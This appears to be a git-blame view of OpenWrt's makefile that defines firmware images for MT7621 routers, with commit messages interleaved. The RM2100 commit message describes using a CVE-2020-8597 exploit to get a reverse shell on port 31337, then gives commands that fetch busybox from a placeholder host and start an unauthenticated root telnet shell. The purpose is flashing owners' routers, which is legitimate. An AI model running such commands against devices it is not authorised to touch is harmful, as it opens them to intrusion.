ramips/mt7621: fix IMAGE_SIZE for all devices This fixes IMAGE_SIZE for all devices based on the partition size given in DTS: DEVICE *.MK *.DTS VERDICT afoundry_ew1200 (16M) 0xfb0000 asiarf_ap7621-001 (16M) 0xfa0000 wrong buffalo_wsr-1166dhp (16M) 0xf90000 wrong buffalo_wsr-600dhp (16M) 0xfb0000 dlink_dir-860l-b1 (16M) 0xfb0000 d-team_newifi-d2 (32M) 0x1fb0000 d-team_pbr-m1 (16M) 0xfb0000 elecom_wrc-1167ghbk2-s 15488k 0xf20000 elecom_wrc-1900gst 11264k 0xb00000 elecom_wrc-2533gst 11264k 0xb00000 firefly_firewrt (16M) 0xfb0000 gehua_ghl-r-001 (32M) 0x1fb0000 gnubee_gb-pc1 (32M) 0x1fb0000 gnubee_gb-pc2 (32M) 0x1fb0000 hiwifi_hc5962 (32M) 0x2000000 wrong (kernel + ubi) iodata_wn-ax1167gr 15552k 0xf30000 iodata_wn-gx300gr 7798784 0x770000 lenovo_newifi-d1 (32M) 0x1fb0000 linksys_re6500 - 0x7b0000 default mediatek_ap-mt7621a-v60 (8M) 0x7b0000 mediatek_mt7621-eval-board (4M) 0xec0000 wrong (rootfs) mikrotik_rb750gr3 [16128k] 0xfc0000 mikrotik_rbm11g [16128k] 0xFC0000 mikrotik_rbm33g [16128k] 0xFC0000 mqmaker_witi-256m (16M) 0xfb0000 mqmaker_witi-512m (16M) 0xfb0000 mtc_wr1201 16000k 0xfa0000 netgear_ex6150 14848k 0xe80000 netgear_r6220 28672k 0x1c00000 netgear_r6350 40960k 0x2800000 netgear_wndr3700-v5 15232k 0xee0000 netis_wf-2881 129280k 0x7E40000 phicomm_k2p 15744k 0xf60000 planex_vr500 66453504 0x3fb0000 wrong samknows_whitebox-v8 (16M) 0xfb0000 storylink_sap-g3200u3 - 0x7b0000 default telco-electronics_x1 16064k 0xfb0000 thunder_timecloud - 0xfb0000 wrong totolink_a7000r 16064k 0xfb0000 tplink_re350-v1 6016k 0x5e0000 ubiquiti_edgerouterx - 0xfa00000 wrong (kernel1 + ubi) ubiquiti_edgerouterx-sfp - 0xfa00000 wrong (kernel1 + ubi) unielec_u7621-06-256m-16m 16064k 0xfb0000 unielec_u7621-06-512m-64m 65216k 0x3fb0000 wevo_11acnas (16M) 0xfb0000 wevo_w2914ns-v2 (16M) 0xfb0000 xiaomi_mir3g 32768k 0x7980000 wrong (kernel + ubi) xiaomi_mir3p (32M) 0xf980000 wrong (kernel + ubi) xzwifi_creativebox-v1 (32M) 0x1fb0000 youhua_wr1200js 16064k 0xfb0000 youku_yk-l2 (16M) 0xfb0000 zbtlink_zbt-we1326 (16M) 0xfb0000 zbtlink_zbt-we3526 (16M) 0xfb0000 zbtlink_zbt-wg2626 (16M) 0xfb0000 zbtlink_zbt-wg3526-16m (16M) 0xfb0000 zbtlink_zbt-wg3526-32m (32M) 0x1fb0000 No verdict means that the device is correctly set. Legend: ( ): Value is set via ralink_default_fw_size_xxM [ ]: Value is derived from parent definition - : Value is not set and derived from default definition Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
2019-07-15 12:55:24 +00:00
IMAGE_SIZE := 65216k
DEVICE_VENDOR := Planex
DEVICE_MODEL := VR500
DEVICE_PACKAGES := kmod-usb3
SUPPORTED_DEVICES += vr500
endef
TARGET_DEVICES += planex_vr500
define Device/samknows_whitebox-v8
IMAGE_SIZE := 16064k
DEVICE_VENDOR := SamKnows
DEVICE_MODEL := Whitebox 8
DEVICE_PACKAGES := kmod-mt7603 kmod-mt76x2 kmod-usb3 \
kmod-usb-ledtrig-usbport uboot-envtools wpad-basic
SUPPORTED_DEVICES += sk-wb8
endef
TARGET_DEVICES += samknows_whitebox-v8
define Device/storylink_sap-g3200u3
IMAGE_SIZE := 7872k
DEVICE_VENDOR := STORYLiNK
DEVICE_MODEL := SAP-G3200U3
DEVICE_PACKAGES := kmod-mt76x2 kmod-usb3 kmod-usb-ledtrig-usbport wpad-basic
SUPPORTED_DEVICES += sap-g3200u3
endef
TARGET_DEVICES += storylink_sap-g3200u3
define Device/telco-electronics_x1
IMAGE_SIZE := 16064k
DEVICE_VENDOR := Telco Electronics
DEVICE_MODEL := X1
DEVICE_PACKAGES := kmod-usb3 kmod-mt76 wpad-basic
endef
TARGET_DEVICES += telco-electronics_x1
define Device/thunder_timecloud
$(Device/uimage-lzma-loader)
IMAGE_SIZE := 16064k
DEVICE_VENDOR := Thunder
DEVICE_MODEL := Timecloud
DEVICE_PACKAGES := kmod-usb3
SUPPORTED_DEVICES += timecloud
endef
TARGET_DEVICES += thunder_timecloud
define Device/totolink_a7000r
IMAGE_SIZE := 16064k
UIMAGE_NAME := C8340R1C-9999
DEVICE_VENDOR := TOTOLINK
DEVICE_MODEL := A7000R
DEVICE_PACKAGES := kmod-mt7615e kmod-mt7615-firmware wpad-basic
endef
TARGET_DEVICES += totolink_a7000r
2019-04-17 18:17:45 +00:00
define Device/tplink_re350-v1
$(Device/tplink-safeloader)
DEVICE_MODEL := RE350
DEVICE_VARIANT := v1
DEVICE_PACKAGES := kmod-mt7603 kmod-mt76x2 wpad-basic
TPLINK_BOARD_ID := RE350-V1
IMAGE_SIZE := 6016k
SUPPORTED_DEVICES += re350-v1
endef
TARGET_DEVICES += tplink_re350-v1
define Device/tplink_re500-v1
$(Device/tplink-safeloader)
DEVICE_MODEL := RE500
DEVICE_VARIANT := v1
DEVICE_PACKAGES := kmod-mt7615e kmod-mt7615-firmware wpad-basic
TPLINK_BOARD_ID := RE500-V1
IMAGE_SIZE := 14208k
endef
TARGET_DEVICES += tplink_re500-v1
2019-04-17 18:17:45 +00:00
define Device/tplink_re650-v1
$(Device/tplink-safeloader)
DEVICE_MODEL := RE650
DEVICE_VARIANT := v1
DEVICE_PACKAGES := kmod-mt7615e kmod-mt7615-firmware wpad-basic
2019-04-17 18:17:45 +00:00
TPLINK_BOARD_ID := RE650-V1
IMAGE_SIZE := 14208k
endef
TARGET_DEVICES += tplink_re650-v1
define Device/ubnt_edgerouter_common
$(Device/uimage-lzma-loader)
DEVICE_VENDOR := Ubiquiti
ramips/mt7621: fix IMAGE_SIZE for all devices This fixes IMAGE_SIZE for all devices based on the partition size given in DTS: DEVICE *.MK *.DTS VERDICT afoundry_ew1200 (16M) 0xfb0000 asiarf_ap7621-001 (16M) 0xfa0000 wrong buffalo_wsr-1166dhp (16M) 0xf90000 wrong buffalo_wsr-600dhp (16M) 0xfb0000 dlink_dir-860l-b1 (16M) 0xfb0000 d-team_newifi-d2 (32M) 0x1fb0000 d-team_pbr-m1 (16M) 0xfb0000 elecom_wrc-1167ghbk2-s 15488k 0xf20000 elecom_wrc-1900gst 11264k 0xb00000 elecom_wrc-2533gst 11264k 0xb00000 firefly_firewrt (16M) 0xfb0000 gehua_ghl-r-001 (32M) 0x1fb0000 gnubee_gb-pc1 (32M) 0x1fb0000 gnubee_gb-pc2 (32M) 0x1fb0000 hiwifi_hc5962 (32M) 0x2000000 wrong (kernel + ubi) iodata_wn-ax1167gr 15552k 0xf30000 iodata_wn-gx300gr 7798784 0x770000 lenovo_newifi-d1 (32M) 0x1fb0000 linksys_re6500 - 0x7b0000 default mediatek_ap-mt7621a-v60 (8M) 0x7b0000 mediatek_mt7621-eval-board (4M) 0xec0000 wrong (rootfs) mikrotik_rb750gr3 [16128k] 0xfc0000 mikrotik_rbm11g [16128k] 0xFC0000 mikrotik_rbm33g [16128k] 0xFC0000 mqmaker_witi-256m (16M) 0xfb0000 mqmaker_witi-512m (16M) 0xfb0000 mtc_wr1201 16000k 0xfa0000 netgear_ex6150 14848k 0xe80000 netgear_r6220 28672k 0x1c00000 netgear_r6350 40960k 0x2800000 netgear_wndr3700-v5 15232k 0xee0000 netis_wf-2881 129280k 0x7E40000 phicomm_k2p 15744k 0xf60000 planex_vr500 66453504 0x3fb0000 wrong samknows_whitebox-v8 (16M) 0xfb0000 storylink_sap-g3200u3 - 0x7b0000 default telco-electronics_x1 16064k 0xfb0000 thunder_timecloud - 0xfb0000 wrong totolink_a7000r 16064k 0xfb0000 tplink_re350-v1 6016k 0x5e0000 ubiquiti_edgerouterx - 0xfa00000 wrong (kernel1 + ubi) ubiquiti_edgerouterx-sfp - 0xfa00000 wrong (kernel1 + ubi) unielec_u7621-06-256m-16m 16064k 0xfb0000 unielec_u7621-06-512m-64m 65216k 0x3fb0000 wevo_11acnas (16M) 0xfb0000 wevo_w2914ns-v2 (16M) 0xfb0000 xiaomi_mir3g 32768k 0x7980000 wrong (kernel + ubi) xiaomi_mir3p (32M) 0xf980000 wrong (kernel + ubi) xzwifi_creativebox-v1 (32M) 0x1fb0000 youhua_wr1200js 16064k 0xfb0000 youku_yk-l2 (16M) 0xfb0000 zbtlink_zbt-we1326 (16M) 0xfb0000 zbtlink_zbt-we3526 (16M) 0xfb0000 zbtlink_zbt-wg2626 (16M) 0xfb0000 zbtlink_zbt-wg3526-16m (16M) 0xfb0000 zbtlink_zbt-wg3526-32m (32M) 0x1fb0000 No verdict means that the device is correctly set. Legend: ( ): Value is set via ralink_default_fw_size_xxM [ ]: Value is derived from parent definition - : Value is not set and derived from default definition Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
2019-07-15 12:55:24 +00:00
IMAGE_SIZE := 256768k
FILESYSTEMS := squashfs
KERNEL_SIZE := 3145728
KERNEL_INITRAMFS := $$(KERNEL) | \
ubnt-erx-factory-image $(KDIR)/tmp/$$(KERNEL_INITRAMFS_PREFIX)-factory.tar
IMAGE/sysupgrade.bin := sysupgrade-tar | append-metadata
endef
define Device/ubnt_edgerouter-x
$(Device/ubnt_edgerouter_common)
DEVICE_MODEL := EdgeRouter X
SUPPORTED_DEVICES += ubnt-erx ubiquiti,edgerouterx
endef
TARGET_DEVICES += ubnt_edgerouter-x
define Device/ubnt_edgerouter-x-sfp
$(Device/ubnt_edgerouter_common)
DEVICE_MODEL := EdgeRouter X SFP
DEVICE_PACKAGES += kmod-i2c-algo-pca kmod-gpio-pca953x kmod-sfp
SUPPORTED_DEVICES += ubnt-erx-sfp ubiquiti,edgerouterx-sfp
endef
TARGET_DEVICES += ubnt_edgerouter-x-sfp
define Device/ubnt_unifi-nanohd
DEVICE_VENDOR := Ubiquiti
DEVICE_MODEL := UniFi nanoHD
DEVICE_PACKAGES += kmod-mt7603 kmod-mt7615e kmod-mt7615-firmware wpad-basic
IMAGE_SIZE := 15552k
endef
TARGET_DEVICES += ubnt_unifi-nanohd
define Device/unielec_u7621-06-16m
IMAGE_SIZE := 16064k
DEVICE_VENDOR := UniElec
DEVICE_MODEL := U7621-06
DEVICE_VARIANT := 16M
DEVICE_PACKAGES := kmod-ata-ahci kmod-sdhci-mt7620 kmod-usb3
SUPPORTED_DEVICES += u7621-06-256M-16M unielec,u7621-06-256m-16m
endef
TARGET_DEVICES += unielec_u7621-06-16m
define Device/unielec_u7621-06-64m
IMAGE_SIZE := 65216k
DEVICE_VENDOR := UniElec
DEVICE_MODEL := U7621-06
DEVICE_VARIANT := 64M
DEVICE_PACKAGES := kmod-ata-ahci kmod-sdhci-mt7620 kmod-usb3
SUPPORTED_DEVICES += unielec,u7621-06-512m-64m
endef
TARGET_DEVICES += unielec_u7621-06-64m
define Device/wevo_11acnas
IMAGE_SIZE := 16064k
UIMAGE_NAME := 11AC-NAS-Router(0.0.0)
DEVICE_VENDOR := WeVO
DEVICE_MODEL := 11AC NAS Router
DEVICE_PACKAGES := kmod-mt7603 kmod-mt76x2 kmod-usb3 \
kmod-usb-ledtrig-usbport wpad-basic
SUPPORTED_DEVICES += 11acnas
endef
TARGET_DEVICES += wevo_11acnas
define Device/wevo_w2914ns-v2
IMAGE_SIZE := 16064k
UIMAGE_NAME := W2914NS-V2(0.0.0)
DEVICE_VENDOR := WeVO
DEVICE_MODEL := W2914NS
DEVICE_VARIANT := v2
DEVICE_PACKAGES := kmod-mt7603 kmod-mt76x2 kmod-usb3 \
kmod-usb-ledtrig-usbport wpad-basic
SUPPORTED_DEVICES += w2914nsv2
endef
TARGET_DEVICES += wevo_w2914ns-v2
ramips: Add support for Xiaomi Mi Router(Black,R2100) The Xiaomi Mi Router AC2100 is a *black* cylindrical router that shares many characteristics (apart from its looks and the GPIO ports) with the 6-antenna *white* "Xiaomi Redmi Router AC2100" See the visual comparison of the two routers here: https://github.com/emirefek/openwrt-R2100/raw/imgcdn/rm2100-r2100.jpg Specification of R2100: - CPU: MediaTek MT7621A - RAM: 128 MB DDR3 - FLASH: 128 MB ESMT NAND - WIFI: 2x2 802.11bgn (MT7603) - WIFI: 4x4 802.11ac (MT7615) - ETH: 3xLAN+1xWAN 1000base-T - LED: Power, WAN in Yellow and Blue - UART: On board (Don't know where is should be confirmed by anybody else) - Modified u-boot Hacking of official firmware process is same at both RM2100 and R2100. Thanks to @namidairo Here is the detailed guide Hack: https://github.com/impulse/ac2100-openwrt-guide Guide is written for MacOS but it will work at linux. needed packages: python3(with scapy), netcat, http server, telnet client 1. Run PPPoE&exploit to get nc and wget busybox, get telnet and wget firmware 2. mtd write openwrt-ramips-mt7621-xiaomi_mi-router-ac2100-kernel1.bin kernel1 3. nvram set uart_en=1 4. nvram set bootdelay=5 5. nvram set flag_try_sys1_failed=1 6. nvram commit 7. mtd -r write openwrt-ramips-mt7621-xiaomi_mi-router-ac2100-rootfs0.bin rootfs0 other than these I specified in here. Everything is same with: https://github.com/openwrt/openwrt/commit/f3792690c4f0567a8965d82898295b9d50c3bb7e Thanks for all community and especially for this device: @Ilyas @scp07 @namidairo @Percy @thorsten97 @impulse (names@forum.openwrt.com) MAC Locations: WAN *:b5 = factory 0xe006 LAN *:b6 = factory 0xe000 WIFI 5ghz *:b8 = factory 0x8004 WIFI 2.4ghz *:b7 = factory 0x0004 Signed-off-by: Emir Efe Kucuk <emirefek@gmail.com> [refactored common image bits into Device/xiaomi-ac2100, fixed From:] Signed-off-by: Petr Štetiar <ynezz@true.cz>
2020-05-30 09:18:50 +00:00
define Device/xiaomi-ac2100
$(Device/uimage-lzma-loader)
BLOCKSIZE := 128k
PAGESIZE := 2048
KERNEL_SIZE := 4096k
IMAGE_SIZE := 120320k
UBINIZE_OPTS := -E 5
IMAGES += kernel1.bin rootfs0.bin
IMAGE/kernel1.bin := append-kernel
IMAGE/rootfs0.bin := append-ubi | check-size
IMAGE/sysupgrade.bin := sysupgrade-tar | append-metadata
DEVICE_VENDOR := Xiaomi
DEVICE_PACKAGES := kmod-mt7603 kmod-mt7615e kmod-mt7615-firmware wpad-basic uboot-envtools
endef
define Device/xiaomi_mi-router-ac2100
$(Device/xiaomi-ac2100)
DEVICE_MODEL := Mi Router AC2100
endef
TARGET_DEVICES += xiaomi_mi-router-ac2100
define Device/xiaomi_mir3g
$(Device/uimage-lzma-loader)
BLOCKSIZE := 128k
PAGESIZE := 2048
KERNEL_SIZE := 4096k
ramips/mt7621: fix IMAGE_SIZE for all devices This fixes IMAGE_SIZE for all devices based on the partition size given in DTS: DEVICE *.MK *.DTS VERDICT afoundry_ew1200 (16M) 0xfb0000 asiarf_ap7621-001 (16M) 0xfa0000 wrong buffalo_wsr-1166dhp (16M) 0xf90000 wrong buffalo_wsr-600dhp (16M) 0xfb0000 dlink_dir-860l-b1 (16M) 0xfb0000 d-team_newifi-d2 (32M) 0x1fb0000 d-team_pbr-m1 (16M) 0xfb0000 elecom_wrc-1167ghbk2-s 15488k 0xf20000 elecom_wrc-1900gst 11264k 0xb00000 elecom_wrc-2533gst 11264k 0xb00000 firefly_firewrt (16M) 0xfb0000 gehua_ghl-r-001 (32M) 0x1fb0000 gnubee_gb-pc1 (32M) 0x1fb0000 gnubee_gb-pc2 (32M) 0x1fb0000 hiwifi_hc5962 (32M) 0x2000000 wrong (kernel + ubi) iodata_wn-ax1167gr 15552k 0xf30000 iodata_wn-gx300gr 7798784 0x770000 lenovo_newifi-d1 (32M) 0x1fb0000 linksys_re6500 - 0x7b0000 default mediatek_ap-mt7621a-v60 (8M) 0x7b0000 mediatek_mt7621-eval-board (4M) 0xec0000 wrong (rootfs) mikrotik_rb750gr3 [16128k] 0xfc0000 mikrotik_rbm11g [16128k] 0xFC0000 mikrotik_rbm33g [16128k] 0xFC0000 mqmaker_witi-256m (16M) 0xfb0000 mqmaker_witi-512m (16M) 0xfb0000 mtc_wr1201 16000k 0xfa0000 netgear_ex6150 14848k 0xe80000 netgear_r6220 28672k 0x1c00000 netgear_r6350 40960k 0x2800000 netgear_wndr3700-v5 15232k 0xee0000 netis_wf-2881 129280k 0x7E40000 phicomm_k2p 15744k 0xf60000 planex_vr500 66453504 0x3fb0000 wrong samknows_whitebox-v8 (16M) 0xfb0000 storylink_sap-g3200u3 - 0x7b0000 default telco-electronics_x1 16064k 0xfb0000 thunder_timecloud - 0xfb0000 wrong totolink_a7000r 16064k 0xfb0000 tplink_re350-v1 6016k 0x5e0000 ubiquiti_edgerouterx - 0xfa00000 wrong (kernel1 + ubi) ubiquiti_edgerouterx-sfp - 0xfa00000 wrong (kernel1 + ubi) unielec_u7621-06-256m-16m 16064k 0xfb0000 unielec_u7621-06-512m-64m 65216k 0x3fb0000 wevo_11acnas (16M) 0xfb0000 wevo_w2914ns-v2 (16M) 0xfb0000 xiaomi_mir3g 32768k 0x7980000 wrong (kernel + ubi) xiaomi_mir3p (32M) 0xf980000 wrong (kernel + ubi) xzwifi_creativebox-v1 (32M) 0x1fb0000 youhua_wr1200js 16064k 0xfb0000 youku_yk-l2 (16M) 0xfb0000 zbtlink_zbt-we1326 (16M) 0xfb0000 zbtlink_zbt-we3526 (16M) 0xfb0000 zbtlink_zbt-wg2626 (16M) 0xfb0000 zbtlink_zbt-wg3526-16m (16M) 0xfb0000 zbtlink_zbt-wg3526-32m (32M) 0x1fb0000 No verdict means that the device is correctly set. Legend: ( ): Value is set via ralink_default_fw_size_xxM [ ]: Value is derived from parent definition - : Value is not set and derived from default definition Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
2019-07-15 12:55:24 +00:00
IMAGE_SIZE := 124416k
UBINIZE_OPTS := -E 5
IMAGES += kernel1.bin rootfs0.bin
IMAGE/kernel1.bin := append-kernel
IMAGE/rootfs0.bin := append-ubi | check-size
IMAGE/sysupgrade.bin := sysupgrade-tar | append-metadata
DEVICE_VENDOR := Xiaomi
DEVICE_MODEL := Mi Router 3G
SUPPORTED_DEVICES += R3G
SUPPORTED_DEVICES += mir3g
DEVICE_PACKAGES := kmod-mt7603 kmod-mt76x2 kmod-usb3 \
kmod-usb-ledtrig-usbport wpad-basic uboot-envtools
endef
TARGET_DEVICES += xiaomi_mir3g
define Device/xiaomi_mir3g-v2
$(Device/uimage-lzma-loader)
IMAGE_SIZE := 14848k
DEVICE_VENDOR := Xiaomi
DEVICE_MODEL := Mi Router 3G
DEVICE_VARIANT := v2
DEVICE_ALT0_VENDOR := Xiaomi
DEVICE_ALT0_MODEL := Mi Router 4A
DEVICE_ALT0_VARIANT := Gigabit Edition
DEVICE_PACKAGES := kmod-mt7603 kmod-mt76x2 wpad-basic
endef
TARGET_DEVICES += xiaomi_mir3g-v2
define Device/xiaomi_mir3p
$(Device/uimage-lzma-loader)
BLOCKSIZE := 128k
PAGESIZE := 2048
KERNEL_SIZE:= 4096k
UBINIZE_OPTS := -E 5
ramips/mt7621: fix IMAGE_SIZE for all devices This fixes IMAGE_SIZE for all devices based on the partition size given in DTS: DEVICE *.MK *.DTS VERDICT afoundry_ew1200 (16M) 0xfb0000 asiarf_ap7621-001 (16M) 0xfa0000 wrong buffalo_wsr-1166dhp (16M) 0xf90000 wrong buffalo_wsr-600dhp (16M) 0xfb0000 dlink_dir-860l-b1 (16M) 0xfb0000 d-team_newifi-d2 (32M) 0x1fb0000 d-team_pbr-m1 (16M) 0xfb0000 elecom_wrc-1167ghbk2-s 15488k 0xf20000 elecom_wrc-1900gst 11264k 0xb00000 elecom_wrc-2533gst 11264k 0xb00000 firefly_firewrt (16M) 0xfb0000 gehua_ghl-r-001 (32M) 0x1fb0000 gnubee_gb-pc1 (32M) 0x1fb0000 gnubee_gb-pc2 (32M) 0x1fb0000 hiwifi_hc5962 (32M) 0x2000000 wrong (kernel + ubi) iodata_wn-ax1167gr 15552k 0xf30000 iodata_wn-gx300gr 7798784 0x770000 lenovo_newifi-d1 (32M) 0x1fb0000 linksys_re6500 - 0x7b0000 default mediatek_ap-mt7621a-v60 (8M) 0x7b0000 mediatek_mt7621-eval-board (4M) 0xec0000 wrong (rootfs) mikrotik_rb750gr3 [16128k] 0xfc0000 mikrotik_rbm11g [16128k] 0xFC0000 mikrotik_rbm33g [16128k] 0xFC0000 mqmaker_witi-256m (16M) 0xfb0000 mqmaker_witi-512m (16M) 0xfb0000 mtc_wr1201 16000k 0xfa0000 netgear_ex6150 14848k 0xe80000 netgear_r6220 28672k 0x1c00000 netgear_r6350 40960k 0x2800000 netgear_wndr3700-v5 15232k 0xee0000 netis_wf-2881 129280k 0x7E40000 phicomm_k2p 15744k 0xf60000 planex_vr500 66453504 0x3fb0000 wrong samknows_whitebox-v8 (16M) 0xfb0000 storylink_sap-g3200u3 - 0x7b0000 default telco-electronics_x1 16064k 0xfb0000 thunder_timecloud - 0xfb0000 wrong totolink_a7000r 16064k 0xfb0000 tplink_re350-v1 6016k 0x5e0000 ubiquiti_edgerouterx - 0xfa00000 wrong (kernel1 + ubi) ubiquiti_edgerouterx-sfp - 0xfa00000 wrong (kernel1 + ubi) unielec_u7621-06-256m-16m 16064k 0xfb0000 unielec_u7621-06-512m-64m 65216k 0x3fb0000 wevo_11acnas (16M) 0xfb0000 wevo_w2914ns-v2 (16M) 0xfb0000 xiaomi_mir3g 32768k 0x7980000 wrong (kernel + ubi) xiaomi_mir3p (32M) 0xf980000 wrong (kernel + ubi) xzwifi_creativebox-v1 (32M) 0x1fb0000 youhua_wr1200js 16064k 0xfb0000 youku_yk-l2 (16M) 0xfb0000 zbtlink_zbt-we1326 (16M) 0xfb0000 zbtlink_zbt-we3526 (16M) 0xfb0000 zbtlink_zbt-wg2626 (16M) 0xfb0000 zbtlink_zbt-wg3526-16m (16M) 0xfb0000 zbtlink_zbt-wg3526-32m (32M) 0x1fb0000 No verdict means that the device is correctly set. Legend: ( ): Value is set via ralink_default_fw_size_xxM [ ]: Value is derived from parent definition - : Value is not set and derived from default definition Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
2019-07-15 12:55:24 +00:00
IMAGE_SIZE := 255488k
DEVICE_VENDOR := Xiaomi
DEVICE_MODEL := Mi Router 3 Pro
IMAGES += factory.bin
IMAGE/sysupgrade.bin := sysupgrade-tar | append-metadata
IMAGE/factory.bin := append-kernel | pad-to $$(KERNEL_SIZE) | append-ubi | \
check-size
DEVICE_PACKAGES := kmod-mt7615e kmod-mt7615-firmware kmod-usb3 kmod-usb-ledtrig-usbport \
wpad-basic uboot-envtools
endef
TARGET_DEVICES += xiaomi_mir3p
ramips: Add support for Xiaomi Redmi Router AC2100 (RM2100) Specification: - CPU: MediaTek MT7621A - RAM: 128 MB DDR3 - FLASH: 128 MB ESMT NAND - WIFI: 2x2 802.11bgn (MT7603) - WIFI: 4x4 802.11ac (MT7615) - ETH: 3xLAN+1xWAN 1000base-T - LED: Power, WAN, in Amber and White - UART: On board near ethernet, opposite side from power - Modified u-boot Installation: 1. Run linked exploit to get shell, startup telnet and wget the files over 2. mtd write openwrt-ramips-mt7621-xiaomi_rm2100-squashfs-kernel1.bin kernel1 3. nvram set uart_en=1 4. nvram set bootdelay=5 5. nvram set flag_try_sys1_failed=1 6. nvram commit 7. mtd -r write openwrt-ramips-mt7621-xiaomi_rm2100-squashfs-rootfs0.bin rootfs0 Restore to stock: 1. Setup PXE and TFTP server serving stock firmware image (See dhcp-boot option of dnsmasq) 2. Hold reset button down before powering on and wait for flashing amber led 3. Release reset button 4. Wait until status led changes from flashing amber to white Notes: This device has dual kernel and rootfs slots like other Xiaomi devices currently supported (mir3g, etc.) thus, we use the second slot and overwrite the first rootfs onwards in order to get more space. Exploit and detailed instructions: https://openwrt.org/toh/xiaomi/xiaomi_redmi_router_ac2100 An implementation of CVE-2020-8597 against stock firmware version 1.0.14 This requires a computer with ethernet plugged into the wan port and an active PPPoE session, and if successful will open a reverse shell to 192.168.31.177 on port 31337. As this shell is somewhat unreliable and likely to be killed in a random amount of time, it is recommended to wget a static compiled busybox binary onto the device and start telnetd with it. The stock telnetd and dropbear unfortunately appear inoperable. (Disabled on release versions of stock firmware likely) Ie. wget https://yourip/busybox-mipsel -O /tmp/busybox chmod a+x /tmp/busybox /tmp/busybox telnetd -l /bin/sh Tested-by: David Martinez <bonkilla@gmail.com> Signed-off-by: Richard Huynh <voxlympha@gmail.com>
2020-04-23 02:50:21 +00:00
define Device/xiaomi_redmi-router-ac2100
ramips: Add support for Xiaomi Mi Router(Black,R2100) The Xiaomi Mi Router AC2100 is a *black* cylindrical router that shares many characteristics (apart from its looks and the GPIO ports) with the 6-antenna *white* "Xiaomi Redmi Router AC2100" See the visual comparison of the two routers here: https://github.com/emirefek/openwrt-R2100/raw/imgcdn/rm2100-r2100.jpg Specification of R2100: - CPU: MediaTek MT7621A - RAM: 128 MB DDR3 - FLASH: 128 MB ESMT NAND - WIFI: 2x2 802.11bgn (MT7603) - WIFI: 4x4 802.11ac (MT7615) - ETH: 3xLAN+1xWAN 1000base-T - LED: Power, WAN in Yellow and Blue - UART: On board (Don't know where is should be confirmed by anybody else) - Modified u-boot Hacking of official firmware process is same at both RM2100 and R2100. Thanks to @namidairo Here is the detailed guide Hack: https://github.com/impulse/ac2100-openwrt-guide Guide is written for MacOS but it will work at linux. needed packages: python3(with scapy), netcat, http server, telnet client 1. Run PPPoE&exploit to get nc and wget busybox, get telnet and wget firmware 2. mtd write openwrt-ramips-mt7621-xiaomi_mi-router-ac2100-kernel1.bin kernel1 3. nvram set uart_en=1 4. nvram set bootdelay=5 5. nvram set flag_try_sys1_failed=1 6. nvram commit 7. mtd -r write openwrt-ramips-mt7621-xiaomi_mi-router-ac2100-rootfs0.bin rootfs0 other than these I specified in here. Everything is same with: https://github.com/openwrt/openwrt/commit/f3792690c4f0567a8965d82898295b9d50c3bb7e Thanks for all community and especially for this device: @Ilyas @scp07 @namidairo @Percy @thorsten97 @impulse (names@forum.openwrt.com) MAC Locations: WAN *:b5 = factory 0xe006 LAN *:b6 = factory 0xe000 WIFI 5ghz *:b8 = factory 0x8004 WIFI 2.4ghz *:b7 = factory 0x0004 Signed-off-by: Emir Efe Kucuk <emirefek@gmail.com> [refactored common image bits into Device/xiaomi-ac2100, fixed From:] Signed-off-by: Petr Štetiar <ynezz@true.cz>
2020-05-30 09:18:50 +00:00
$(Device/xiaomi-ac2100)
ramips: Add support for Xiaomi Redmi Router AC2100 (RM2100) Specification: - CPU: MediaTek MT7621A - RAM: 128 MB DDR3 - FLASH: 128 MB ESMT NAND - WIFI: 2x2 802.11bgn (MT7603) - WIFI: 4x4 802.11ac (MT7615) - ETH: 3xLAN+1xWAN 1000base-T - LED: Power, WAN, in Amber and White - UART: On board near ethernet, opposite side from power - Modified u-boot Installation: 1. Run linked exploit to get shell, startup telnet and wget the files over 2. mtd write openwrt-ramips-mt7621-xiaomi_rm2100-squashfs-kernel1.bin kernel1 3. nvram set uart_en=1 4. nvram set bootdelay=5 5. nvram set flag_try_sys1_failed=1 6. nvram commit 7. mtd -r write openwrt-ramips-mt7621-xiaomi_rm2100-squashfs-rootfs0.bin rootfs0 Restore to stock: 1. Setup PXE and TFTP server serving stock firmware image (See dhcp-boot option of dnsmasq) 2. Hold reset button down before powering on and wait for flashing amber led 3. Release reset button 4. Wait until status led changes from flashing amber to white Notes: This device has dual kernel and rootfs slots like other Xiaomi devices currently supported (mir3g, etc.) thus, we use the second slot and overwrite the first rootfs onwards in order to get more space. Exploit and detailed instructions: https://openwrt.org/toh/xiaomi/xiaomi_redmi_router_ac2100 An implementation of CVE-2020-8597 against stock firmware version 1.0.14 This requires a computer with ethernet plugged into the wan port and an active PPPoE session, and if successful will open a reverse shell to 192.168.31.177 on port 31337. As this shell is somewhat unreliable and likely to be killed in a random amount of time, it is recommended to wget a static compiled busybox binary onto the device and start telnetd with it. The stock telnetd and dropbear unfortunately appear inoperable. (Disabled on release versions of stock firmware likely) Ie. wget https://yourip/busybox-mipsel -O /tmp/busybox chmod a+x /tmp/busybox /tmp/busybox telnetd -l /bin/sh Tested-by: David Martinez <bonkilla@gmail.com> Signed-off-by: Richard Huynh <voxlympha@gmail.com>
2020-04-23 02:50:21 +00:00
DEVICE_MODEL := Redmi Router AC2100
endef
TARGET_DEVICES += xiaomi_redmi-router-ac2100
define Device/xiaoyu_xy-c5
IMAGE_SIZE := 32448k
DEVICE_VENDOR := XiaoYu
DEVICE_MODEL := XY-C5
DEVICE_PACKAGES := kmod-ata-ahci kmod-usb3
endef
TARGET_DEVICES += xiaoyu_xy-c5
define Device/xzwifi_creativebox-v1
IMAGE_SIZE := 32448k
DEVICE_VENDOR := CreativeBox
DEVICE_MODEL := v1
DEVICE_PACKAGES := kmod-ata-ahci kmod-mt7603 kmod-mt76x2 kmod-sdhci-mt7620 \
kmod-usb3
endef
TARGET_DEVICES += xzwifi_creativebox-v1
define Device/youhua_wr1200js
IMAGE_SIZE := 16064k
DEVICE_VENDOR := YouHua
DEVICE_MODEL := WR1200JS
DEVICE_PACKAGES := kmod-mt7603 kmod-mt76x2 kmod-usb3 \
kmod-usb-ledtrig-usbport wpad-basic
endef
TARGET_DEVICES += youhua_wr1200js
define Device/youku_yk-l2
IMAGE_SIZE := 16064k
DEVICE_VENDOR := Youku
DEVICE_MODEL := YK-L2
DEVICE_PACKAGES := kmod-mt7603 kmod-mt76x2 kmod-usb3 \
